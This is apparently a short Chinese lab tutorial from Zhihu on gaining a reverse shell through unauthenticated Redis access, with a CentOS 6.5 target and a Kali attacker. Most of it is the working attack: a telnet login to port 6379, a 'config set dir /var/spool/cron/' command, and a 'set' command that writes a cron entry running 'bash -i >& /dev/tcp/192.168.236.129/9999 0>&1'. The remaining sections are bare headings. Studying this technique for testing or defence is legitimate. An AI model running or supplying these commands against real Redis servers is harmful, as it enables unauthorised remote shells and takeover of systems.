Redis未授权访问之反弹shell

靶机：centos6.5

公鸡：Kali

一、crontab基础姿势

Crontab定时任务配置 - 潇湘隐者 - 博客园

二、redis未授权登录服务器

1、telnet登录/也可以redis-cli登录

telnet 192.168.236.130 6379 //未授权登录

config set dir /var/spool/cron/ //配置文件夹的路径（CONFIG SET 命令可以动态地调整 Redis 服务器的配置而(configuration)而无须重启。）//每个用户生成的crontab文件，都会放在 /var/spool/cron/ 目录下面

set -.- "\n\n\n* * * * * bash -i >& /dev/tcp/192.168.236.129/9999 0>&1\n\n\n" //直接往当前用户的crontab里写入反弹shell，换行是必不可少的。

三、nc反弹

四、Centos里面查看crontab任务。

作者：呵呵呵呵呵呵
链接：https://zhuanlan.zhihu.com/p/25015624
来源：知乎
著作权归作者所有。商业转载请联系作者获得授权，非商业转载请注明出处。